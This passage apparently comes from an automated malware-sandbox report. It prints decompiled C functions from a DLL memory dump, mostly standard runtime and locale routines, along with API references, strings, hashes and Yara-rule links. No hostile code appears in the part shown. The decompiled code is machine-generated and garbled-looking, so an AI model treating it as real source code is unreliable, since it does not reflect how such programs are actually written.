						_t30 = E6DDEF8B6(__edx, __esi, _t33);
						 *((intOrPtr*)(_t31 + 8)) = _t30;
						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
						_t16 = E6DDB1450(__ebx, _t31 - 0x40, __edx, _t28, _t30, E6DDB1703( *((intOrPtr*)(_t31 + 0xc))), 0x44);
						 *(_t30 + 4) =  *(_t30 + 4) & 0x00000000;
						 *_t30 = 0x6de3a9c0;
						E6DDB1928(_t30, _t16);
						 *_t28 = _t30;
						E6DDB14CE(_t31 - 0x40);
					}
				}
				_t12 = 2;
				return E6DDF0075(_t12);
			}

0x6ddb18a7
0x6ddb18ac
0x6ddb18b1
0x6ddb18b3
0x6ddb18b6
0x6ddb18bf
0x6ddb18c2
0x6ddb18c8
0x6ddb18d5
0x6ddb18da
0x6ddb18e1
0x6ddb18e7
0x6ddb18ef
0x6ddb18f1
0x6ddb18f1
0x6ddb18b6
0x6ddb18f8
0x6ddb18fe

APIs

__EH_prolog3.LIBCMT ref: 6DDB18A7
std::_Locinfo::_Locinfo.LIBCPMT ref: 6DDB18D5

Part of subcall function 6DDB1450: __EH_prolog3.LIBCMT ref: 6DDB1457
Part of subcall function 6DDB1450: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB1464
Part of subcall function 6DDB1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DDB14A1

ctype.LIBCPMT ref: 6DDB18E7

Part of subcall function 6DDB1928: __Getctype.LIBCPMT ref: 6DDB1937
Part of subcall function 6DDB1928: __Getcvt.LIBCPMT ref: 6DDB1949

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6DDB18F1

Part of subcall function 6DDB14CE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6DDB14F5
Part of subcall function 6DDB14CE: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1566

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Locinfo::_$H_prolog3LocinfoLockit$GetctypeGetcvtLocinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_ctype
String ID:
API String ID: 1262428101-0
Opcode ID: 5bf1cc67c6f0e7e674a0115894951abd2d036c9c3f285d347df3af20dfcd48a4
Instruction ID: f294c94dd56177066b8b1397d79839e155ea365726ed5745c64324f7d5e66b21
Opcode Fuzzy Hash: 5bf1cc67c6f0e7e674a0115894951abd2d036c9c3f285d347df3af20dfcd48a4
Instruction Fuzzy Hash: EEF05EB5948715EBDB10BF60D445BAD77A4AF4075DF634409F30A5B280CF749A41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDB968, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 323
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6DDDB968(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t135;
				intOrPtr* _t136;
				intOrPtr* _t141;
				void* _t146;
				char _t152;
				signed int _t153;
				char* _t154;
				signed int _t160;
				void* _t166;
				void* _t167;
				char* _t173;
				void* _t174;
				void* _t175;
				void* _t185;
				intOrPtr _t186;
				intOrPtr _t192;
				intOrPtr _t198;
				char* _t199;
				intOrPtr _t213;
				char _t224;
				intOrPtr* _t235;
				signed int _t236;
				signed int _t237;
				intOrPtr _t238;
				signed int _t242;
				signed int _t243;
				char* _t247;
				signed int _t249;
				signed int _t251;
				void* _t252;
				void* _t253;

				_t234 = __edx;
				E6DDF00E0(0x6de386b8, __ebx, __edi, __esi, 0x70);
				_t198 =  *((intOrPtr*)(_t252 + 0x10));
				 *((intOrPtr*)(_t252 - 0x78)) =  *((intOrPtr*)(_t252 + 0xc));
				 *((intOrPtr*)(_t252 - 0x70)) =  *((intOrPtr*)(_t252 + 0x14));
				_t135 =  *(_t252 + 0x1c);
				 *(_t252 - 0x68) = _t135;
				_t136 = E6DDDA2F1(_t198, __edx, __edi, __esi, __eflags);
				_t240 = _t136;
				_t245 =  *((intOrPtr*)( *_t136 + 0x14));
				 *0x6de3a26c(_t252 - 0x5c, _t135);
				 *((intOrPtr*)( *((intOrPtr*)( *_t136 + 0x14))))();
				 *(_t252 - 4) =  *(_t252 - 4) & 0x00000000;
				_t255 =  *((intOrPtr*)(_t252 - 0x4c));
				if( *((intOrPtr*)(_t252 - 0x4c)) != 0) {
					 *((char*)(_t252 - 0x5e)) = E6DDDDA49(_t240);
				} else {
					 *((char*)(_t252 - 0x5e)) = 0;
				}
				_t141 = E6DDDA0FF(_t198, _t234, _t240, _t245, _t255);
				 *0x6de3a26c("0123456789ABCDEFabcdef-+Xx", 0x6de3ba77, _t252 - 0x2c,  *(_t252 - 0x68));
				 *((intOrPtr*)( *((intOrPtr*)( *_t141 + 0x1c))))();
				_t247 =  *((intOrPtr*)(_t252 - 0x78));
				 *((intOrPtr*)(_t252 - 0x6c)) = _t247;
				_t146 = E6DDDD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
				if(_t146 != 0) {
					L13:
					_t249 =  *(_t252 + 0x18) & 0x00000e00;
					_t242 = 0xa;
					 *(_t252 - 0x68) = _t242;
					if(_t249 != 0x400) {
						__eflags = _t249 - 0x800;
						if(_t249 != 0x800) {
							asm("sbb esi, esi");
							_t251 =  ~_t249 & _t242;
							__eflags = _t251;
							L19:
							 *((char*)(_t252 - 0x5d)) = 0;
							 *((char*)(_t252 - 0x74)) = 0;
							 *((char*)(_t252 - 0x5f)) = 0;
							E6DDDD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
							if(0 != 0) {
								L35:
								__eflags = _t251;
								if(_t251 == 0) {
									L38:
									 *(_t252 - 0x34) =  *(_t252 - 0x34) & 0x00000000;
									 *((intOrPtr*)(_t252 - 0x30)) = 0xf;
									 *(_t252 - 0x44) = 0;
									E6DDD6BD5(_t252 - 0x44, 1,  *((intOrPtr*)(_t252 - 0x74)));
									 *(_t252 - 4) = 1;
									_t243 = 0;
									 *((intOrPtr*)(_t252 - 0x7c)) =  *((intOrPtr*)(_t252 - 0x78)) + 0x1f;
									_t152 = E6DDDD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
									if(_t152 != 0) {
										_t213 =  *((intOrPtr*)(_t252 - 0x30));
										_t153 =  *(_t252 - 0x44);
										L71:
										_t199 =  *((intOrPtr*)(_t252 - 0x5d));
										L72:
										_t235 = _t252 - 0x5c;
										if( *((intOrPtr*)(_t252 - 0x48)) >= 0x10) {
											_t235 =  *((intOrPtr*)(_t252 - 0x5c));
										}
										if(_t199 == 0) {
											L89:
											_t154 =  *((intOrPtr*)(_t252 - 0x78));
											goto L90;
										} else {
											while(_t243 != 0) {
												_t199 =  *_t235;
												if(_t199 == 0x7f) {
													break;
												}
												_t243 = _t243 - 1;
												if(_t243 == 0) {
													L81:
													if(_t243 != 0) {
														L85:
														_t199 = _t235 + 1;
														if( *_t199 > 0) {
															_t235 = _t199;
														}
														continue;
													}
													 *(_t252 - 0x68) = _t252 - 0x44;
													if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
														 *(_t252 - 0x68) = _t153;
													}
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													if(_t199 <  *( *(_t252 - 0x68))) {
														goto L89;
													} else {
														goto L85;
													}
												}
												 *(_t252 - 0x68) = _t252 - 0x44;
												_t160 =  *(_t252 - 0x44);
												if(_t213 >= 0x10) {
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													 *(_t252 - 0x68) = _t160;
												}
												_t153 =  *(_t252 - 0x44);
												if(_t199 !=  *((intOrPtr*)( *(_t252 - 0x68) + _t243))) {
													goto L89;
												} else {
													goto L81;
												}
											}
											__eflags =  *((char*)(_t252 - 0x5f));
											_t154 =  *((intOrPtr*)(_t252 - 0x6c));
											if( *((char*)(_t252 - 0x5f)) == 0) {
												 *_t154 = 0x30;
												_t154 = _t154 + 1;
											}
											L90:
											 *_t154 = 0;
											E6DDD2B76(_t252 - 0x44);
											E6DDD2B76(_t252 - 0x5c);
											return E6DDF008A(_t251, _t199, _t243, _t251);
										}
									}
									 *((char*)(_t252 - 0x74)) = _t152;
									do {
										if( *((char*)(_t198 + 4)) == 0) {
											E6DDDC59E(_t198);
										}
										_push( *((intOrPtr*)(_t252 - 0x74)));
										 *((char*)(_t252 - 0x64)) =  *((intOrPtr*)(_t198 + 5));
										_t166 = E6DDD9DF2(_t252 - 0x2c, _t252 - 0x12, _t252 - 0x64);
										_t253 = _t253 + 0x10;
										_t167 = _t166 - _t252 - 0x2c;
										if(_t167 >=  *(_t252 - 0x68)) {
											_t213 =  *((intOrPtr*)(_t252 - 0x30));
											_t236 = _t252 - 0x44;
											_t153 =  *(_t252 - 0x44);
											__eflags = _t213 - 0x10;
											if(_t213 >= 0x10) {
												_t236 = _t153;
											}
											__eflags =  *((char*)(_t236 + _t243));
											if( *((char*)(_t236 + _t243)) == 0) {
												L64:
												if(_t243 == 0) {
													goto L71;
												}
												_t237 = _t252 - 0x44;
												if(_t213 >= 0x10) {
													_t237 = _t153;
												}
												if( *((char*)(_t237 + _t243)) <= 0) {
													_t199 = 0;
													goto L72;
												} else {
													_t243 = _t243 + 1;
													goto L71;
												}
											} else {
												__eflags =  *((char*)(_t252 - 0x5e));
												if( *((char*)(_t252 - 0x5e)) == 0) {
													goto L64;
												}
												__eflags =  *((char*)(_t198 + 4));
												if( *((char*)(_t198 + 4)) != 0) {
													_t238 =  *((intOrPtr*)(_t252 - 0x64));
												} else {
													E6DDDC59E(_t198);
													_t238 =  *((intOrPtr*)(_t198 + 5));
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													_t153 =  *(_t252 - 0x44);
												}
												__eflags = _t238 -  *((intOrPtr*)(_t252 - 0x5e));
												if(_t238 !=  *((intOrPtr*)(_t252 - 0x5e))) {
													goto L64;
												} else {
													E6DDD86F2(_t252 - 0x44, 0);
													_t243 = _t243 + 1;
													__eflags = _t243;
													goto L62;
												}
											}
										} else {
											_t224 =  *((intOrPtr*)(_t167 + "0123456789ABCDEFabcdef-+Xx"));
											_t173 =  *((intOrPtr*)(_t252 - 0x6c));
											 *_t173 = _t224;
											if( *((char*)(_t252 - 0x5f)) != 0 || _t224 != 0x30) {
												if(_t173 <  *((intOrPtr*)(_t252 - 0x7c))) {
													 *((char*)(_t252 - 0x5f)) = 1;
													 *((intOrPtr*)(_t252 - 0x6c)) = _t173 + 1;
												}
											}
											_t174 = _t252 - 0x44;
											 *((char*)(_t252 - 0x5d)) = 1;
											if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
												_t174 =  *(_t252 - 0x44);
											}
											if( *((char*)(_t174 + _t243)) != 0x7f) {
												_t175 = _t252 - 0x44;
												if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
													_t175 =  *(_t252 - 0x44);
												}
												 *((char*)(_t175 + _t243)) =  *((char*)(_t175 + _t243)) + 1;
											}
										}
										L62:
										E6DDDBD8B(_t198);
									} while (E6DDDD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70))) == 0);
									_t213 =  *((intOrPtr*)(_t252 - 0x30));
									_t153 =  *(_t252 - 0x44);
									goto L64;
								}
								L36:
								__eflags = _t251 - _t242;
								if(_t251 == _t242) {
									goto L38;
								}
								L37:
								 *(_t252 - 0x68) = ((0 | _t251 != 0x00000008) - 0x00000001 & 0xfffffff2) + 0x16;
								goto L38;
							}
							if( *((intOrPtr*)(_t198 + 4)) == 0) {
								E6DDDC59E(_t198);
							}
							if( *((intOrPtr*)(_t198 + 5)) !=  *((intOrPtr*)(_t252 - 0x2c))) {
								goto L35;
							} else {
								 *((char*)(_t252 - 0x5d)) = 1;
								 *((char*)(_t252 - 0x74)) = 1;
								E6DDDBD8B(_t198);
								_t185 = E6DDDD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
								if(1 != 0) {
									L33:
									__eflags = _t251;
									if(_t251 != 0) {
										goto L36;
									}
									_t251 = 8;
									goto L35;
								}
								if( *((intOrPtr*)(_t198 + 4)) == _t185) {
									E6DDDC59E(_t198);
								}
								_t186 =  *((intOrPtr*)(_t198 + 5));
								if(_t186 ==  *((intOrPtr*)(_t252 - 0x13))) {
									L30:
									if(_t251 == 0 || _t251 == 0x10) {
										_t251 = 0x10;
										 *((char*)(_t252 - 0x5d)) = 0;
										 *((char*)(_t252 - 0x74)) = 0;
										E6DDDBD8B(_t198);
										goto L37;
									} else {
										goto L33;
									}
								} else {
									if( *((char*)(_t198 + 4)) == 0) {
										E6DDDC59E(_t198);
										_t186 =  *((intOrPtr*)(_t198 + 5));
									}
									if(_t186 !=  *((intOrPtr*)(_t252 - 0x14))) {
										goto L33;
									} else {
										goto L30;
									}
								}
							}
						}
						_push(0x10);
						L17:
						_pop(_t251);
						goto L19;
					}
					_push(8);
					goto L17;
				} else {
					if( *((intOrPtr*)(_t198 + 4)) == _t146) {
						E6DDDC59E(_t198);
					}
					_t192 =  *((intOrPtr*)(_t198 + 5));
					if(_t192 !=  *((intOrPtr*)(_t252 - 0x15))) {
						__eflags =  *((char*)(_t198 + 4));
						if( *((char*)(_t198 + 4)) == 0) {
							E6DDDC59E(_t198);
							_t192 =  *((intOrPtr*)(_t198 + 5));
						}
						__eflags = _t192 -  *((intOrPtr*)(_t252 - 0x16));
						if(_t192 !=  *((intOrPtr*)(_t252 - 0x16))) {
							goto L13;
						} else {
							 *_t247 = 0x2d;
							goto L12;
						}
					} else {
						 *_t247 = 0x2b;
						L12:
						 *((intOrPtr*)(_t252 - 0x6c)) = _t247 + 1;
						E6DDDBD8B(_t198);
						goto L13;
					}
				}
			}

0x6dddb968
0x6dddb96f
0x6dddb977
0x6dddb97a
0x6dddb980
0x6dddb983
0x6dddb987
0x6dddb98a
0x6dddb98f
0x6dddb998
0x6dddb99d
0x6dddb9a5
0x6dddb9a7
0x6dddb9ab
0x6dddb9af
0x6dddb9be
0x6dddb9b1
0x6dddb9b1
0x6dddb9b1
0x6dddb9c4
0x6dddb9e1
0x6dddb9e9
0x6dddb9eb
0x6dddb9f5
0x6dddb9f8
0x6dddb9ff
0x6dddba3f
0x6dddba44
0x6dddba4a
0x6dddba4b
0x6dddba54
0x6dddba5a
0x6dddba60
0x6dddba69
0x6dddba6b
0x6dddba6b
0x6dddba6d
0x6dddba74
0x6dddba77
0x6dddba7a
0x6dddba7d
0x6dddba84
0x6dddbb04
0x6dddbb04
0x6dddbb06
0x6dddbb1e
0x6dddbb21
0x6dddbb2a
0x6dddbb31
0x6dddbb35
0x6dddbb45
0x6dddbb49
0x6dddbb4b
0x6dddbb4e
0x6dddbb55
0x6dddbc5d
0x6dddbc60
0x6dddbc63
0x6dddbc63
0x6dddbc66
0x6dddbc6a
0x6dddbc6d
0x6dddbc6f
0x6dddbc6f
0x6dddbc74
0x6dddbcdd
0x6dddbcdd
0x00000000
0x6dddbc76
0x6dddbc76
0x6dddbc7a
0x6dddbc7f
0x00000000
0x00000000
0x6dddbc81
0x6dddbc84
0x6dddbca5
0x6dddbca7
0x6dddbcc2
0x6dddbcc2
0x6dddbcc8
0x6dddbcca
0x6dddbcca
0x00000000
0x6dddbcc8
0x6dddbcb0
0x6dddbcb3
0x6dddbcb5
0x6dddbcb5
0x6dddbcbd
0x6dddbcc0
0x00000000
0x00000000
0x00000000
0x00000000
0x6dddbcc0
0x6dddbc89
0x6dddbc8c
0x6dddbc92
0x6dddbc94
0x6dddbc97
0x6dddbc97
0x6dddbca0
0x6dddbca3
0x00000000
0x00000000
0x00000000
0x00000000
0x6dddbca3
0x6dddbcce
0x6dddbcd2
0x6dddbcd5
0x6dddbcd7
0x6dddbcda
0x6dddbcda
0x6dddbce0
0x6dddbce3
0x6dddbce6
0x6dddbcee
0x6dddbcfa
0x6dddbcfa
0x6dddbc74
0x6dddbb5b
0x6dddbb5e
0x6dddbb62
0x6dddbb66
0x6dddbb66
0x6dddbb6e
0x6dddbb71
0x6dddbb80
0x6dddbb88
0x6dddbb8b
0x6dddbb90
0x6dddbbdc
0x6dddbbdf
0x6dddbbe2
0x6dddbbe5
0x6dddbbe8
0x6dddbbea
0x6dddbbea
0x6dddbbec
0x6dddbbf0
0x6dddbc42
0x6dddbc44
0x00000000
0x00000000
0x6dddbc46
0x6dddbc4c
0x6dddbc4e
0x6dddbc4e
0x6dddbc54
0x6dddbc59
0x00000000
0x6dddbc56
0x6dddbc56
0x00000000
0x6dddbc56
0x6dddbbf2
0x6dddbbf2
0x6dddbbf6
0x00000000
0x00000000
0x6dddbbf8
0x6dddbbfc
0x6dddbc10
0x6dddbbfe
0x6dddbc00
0x6dddbc05
0x6dddbc08
0x6dddbc0b
0x6dddbc0b
0x6dddbc13
0x6dddbc16
0x00000000
0x6dddbc18
0x6dddbc1d
0x6dddbc22
0x6dddbc22
0x00000000
0x6dddbc22
0x6dddbc16
0x6dddbb92
0x6dddbb96
0x6dddbb9c
0x6dddbb9f
0x6dddbba1
0x6dddbbab
0x6dddbbae
0x6dddbbb2
0x6dddbbb2
0x6dddbbab
0x6dddbbb9
0x6dddbbbc
0x6dddbbc0
0x6dddbbc2
0x6dddbbc2
0x6dddbbc9
0x6dddbbcf
0x6dddbbd2
0x6dddbbd4
0x6dddbbd4
0x6dddbbd7
0x6dddbbd7
0x6dddbbc9
0x6dddbc23
0x6dddbc25
0x6dddbc34
0x6dddbc3c
0x6dddbc3f
0x00000000
0x6dddbc3f
0x6dddbb08
0x6dddbb08
0x6dddbb0a
0x00000000
0x00000000
0x6dddbb0c
0x6dddbb1b
0x00000000
0x6dddbb1b
0x6dddba89
0x6dddba8d
0x6dddba8d
0x6dddba98
0x00000000
0x6dddba9a
0x6dddba9e
0x6dddbaa1
0x6dddbaa4
0x6dddbaae
0x6dddbab5
0x6dddbafd
0x6dddbafd
0x6dddbaff
0x00000000
0x00000000
0x6dddbb03
0x00000000
0x6dddbb03
0x6dddbaba
0x6dddbabe
0x6dddbabe
0x6dddbac3
0x6dddbac9
0x6dddbae0
0x6dddbae2
0x6dddbaef
0x6dddbaf0
0x6dddbaf3
0x6dddbaf6
0x00000000
0x00000000
0x00000000
0x00000000
0x6dddbacb
0x6dddbacf
0x6dddbad3
0x6dddbad8
0x6dddbad8
0x6dddbade
0x00000000
0x00000000
0x00000000
0x00000000
0x6dddbade
0x6dddbac9
0x6dddba98
0x6dddba62
0x6dddba64
0x6dddba64
0x00000000
0x6dddba64
0x6dddba56
0x00000000
0x6dddba01
0x6dddba04
0x6dddba08
0x6dddba08
0x6dddba0d
0x6dddba13
0x6dddba1a
0x6dddba1e
0x6dddba22
0x6dddba27
0x6dddba27
0x6dddba2a
0x6dddba2d
0x00000000
0x6dddba2f
0x6dddba2f
0x00000000
0x6dddba2f
0x6dddba15
0x6dddba15
0x6dddba32
0x6dddba37
0x6dddba3a
0x00000000
0x6dddba3a
0x6dddba13

APIs

__EH_prolog3_GS.LIBCMT ref: 6DDDB96F

Part of subcall function 6DDDA2F1: __EH_prolog3.LIBCMT ref: 6DDDA2F8
Part of subcall function 6DDDA2F1: std::_Lockit::_Lockit.LIBCPMT ref: 6DDDA302
Part of subcall function 6DDDA2F1: int.LIBCPMT ref: 6DDDA319
Part of subcall function 6DDDA2F1: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDA373

_Find_unchecked1.LIBCPMT ref: 6DDDBB80

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 6DDDB9D7

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: Lockitstd::_$Find_unchecked1H_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 1853221402-2799312399
Opcode ID: 9d4fbd9b470a1ed1483ab2abadde8751a8df6f868bd4c6bd322e3a0e8276e554
Instruction ID: 59fe766d3428c9f0ed1ee0a4be10d949a74bfeea25148cf71f12dbd86d77a438
Opcode Fuzzy Hash: 9d4fbd9b470a1ed1483ab2abadde8751a8df6f868bd4c6bd322e3a0e8276e554
Instruction Fuzzy Hash: 2FC19130D08289CEDF52EFB8C890BEDBBB1AF45308F165099E4956B287DB709945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6DE160ED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6DE1617D

Strings

pow, xrefs: 6DE16155, 6DE16172

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 4aaa1e528f77585ff62479aad81314563eab47cd08ec6373f1b6e551eb697328
Instruction ID: 4c618ec036994b880903427c504d54798fdaca35c0edc814361042cc57fea77b
Opcode Fuzzy Hash: 4aaa1e528f77585ff62479aad81314563eab47cd08ec6373f1b6e551eb697328
Instruction Fuzzy Hash: DE515371F1D20386DB067B28CD0036A3BF4AB4174AF308D5CE4A992399EF7584C6CA96

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2DBAF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6DE2DBAF(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t15 = E6DE24323(_t23, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6de42f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6de42f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t49 = _t17;
								if(_t17 != 0) {
									_t16 = E6DE1BF09(_t23, _t23);
									goto L25;
								}
								if(E6DE24323(_t23, _t49, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}

0x6de2dbb4
0x6de2dbb5
0x6de2dbbc
0x6de2dc62
0x6de2dc76
0x6de2dc7b
0x6de2dc7d
0x6de2dc83
0x6de2dc86
0x6de2dc88
0x6de2dc8a
0x6de2dc8a
0x6de2dc90
0x6de2dc95
0x6de2dc95
0x6de2dc7f
0x6de2dc7f
0x00000000
0x6de2dc7f
0x6de2dbc2
0x6de2dbc7
0x00000000
0x00000000
0x6de2dbcd
0x6de2dbd2
0x6de2dbd4
0x6de2dbd4
0x6de2dbda
0x00000000
0x00000000
0x6de2dbdf
0x6de2dbf6
0x6de2dbf6
0x6de2dbff
0x6de2dc01
0x00000000
0x00000000
0x6de2dc03
0x6de2dc08
0x6de2dc0a
0x6de2dc0a
0x6de2dc10
0x00000000
0x00000000
0x6de2dc15
0x6de2dc33
0x6de2dc33
0x6de2dc35
0x6de2dc5a
0x00000000
0x6de2dc5f
0x6de2dc52
0x00000000
0x00000000
0x6de2dc54
0x00000000
0x6de2dc54
0x6de2dc17
0x6de2dc1f
0x00000000
0x00000000
0x6de2dc21
0x6de2dc24
0x6de2dc2a
0x00000000
0x00000000
0x00000000
0x6de2dc2c
0x6de2dc2e
0x6de2dc30
0x6de2dc30
0x00000000
0x6de2dc30
0x6de2dbe1
0x6de2dbe9
0x00000000
0x00000000
0x6de2dbeb
0x6de2dbee
0x6de2dbf4
0x00000000
0x00000000
0x00000000
0x6de2dbf4
0x6de2dbfa
0x6de2dbfc
0x6de2dbfc
0x00000000

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6DE2DE50,?,00000050,?,?,?,?,?), ref: 6DE2DC8A

Strings

OCP, xrefs: 6DE2DC03
ACP, xrefs: 6DE2DBCD

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 97abedab3c99ed6679d1a9ec7a61216f9cb5d4ff21493e2eb69beba77d3a1d13
Instruction ID: d1e9d7ad9d66f59e838dbbca647a725537e83a1a93f0a3517ccd16a758c1e891
Opcode Fuzzy Hash: 97abedab3c99ed6679d1a9ec7a61216f9cb5d4ff21493e2eb69beba77d3a1d13
Instruction Fuzzy Hash: 2521C76AA48106A6E714CE14CD02BA773AAAFD4B68F728424EB45E7304EF72D94183D0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEFAE9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6DDEFAE9(void* __ebx, void* __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t30;
				intOrPtr _t31;
				signed int _t34;
				void* _t49;
				signed int _t55;

				if( *0x6de96e51 == 0) {
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 == 0) {
						L4:
						_t19 = E6DDF079B();
						__eflags = _t19;
						if(_t19 == 0) {
							L9:
							_t20 =  *0x6de9506c; // 0xc4837075
							_push(_t49);
							_push(0x20);
							asm("ror eax, cl");
							_t23 = (_t20 & 0x0000001f | 0xffffffff) ^  *0x6de9506c;
							__eflags = _t23;
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							goto L10;
						} else {
							__eflags = _t55;
							if(_t55 != 0) {
								goto L9;
							} else {
								_t25 = E6DE1A8CA(_t19, 0x6de96e54);
								__eflags = _t25;
								if(_t25 != 0) {
									L8:
									_t24 = 0;
								} else {
									_t26 = E6DE1A8CA(_t25, 0x6de96e60);
									__eflags = _t26;
									if(_t26 == 0) {
										L10:
										 *0x6de96e51 = 1;
										_t24 = 1;
									} else {
										goto L8;
									}
								}
							}
						}
						return _t24;
					} else {
						__eflags = _t55 - 1;
						if(_t55 != 1) {
							E6DDF07A7(__edx, _t49, _t55, 5);
							asm("int3");
							E6DDF0990(__ebx, _t49, 0x6de92780, 8);
							_v8 = _v8 & 0x00000000;
							__eflags =  *0x6ddb0000 - 0x5a4d; // 0x5a4d
							if(__eflags != 0) {
								L19:
								_v8 = 0xfffffffe;
								_t30 = 0;
								__eflags = 0;
							} else {
								_t31 =  *0x6ddb003c; // 0x100
								__eflags =  *((intOrPtr*)(_t31 + 0x6ddb0000)) - 0x4550;
								if( *((intOrPtr*)(_t31 + 0x6ddb0000)) != 0x4550) {
									goto L19;
								} else {
									__eflags =  *((intOrPtr*)(_t31 + 0x6ddb0018)) - 0x10b;
									if( *((intOrPtr*)(_t31 + 0x6ddb0018)) != 0x10b) {
										goto L19;
									} else {
										_t34 = E6DDEF931(0x6ddb0000, _a4 - 0x6ddb0000);
										__eflags = _t34;
										if(_t34 == 0) {
											goto L19;
										} else {
											__eflags =  *(_t34 + 0x24);
											if( *(_t34 + 0x24) < 0) {
												goto L19;
											} else {
												_v8 = 0xfffffffe;
												_t30 = 1;
											}
										}
									}
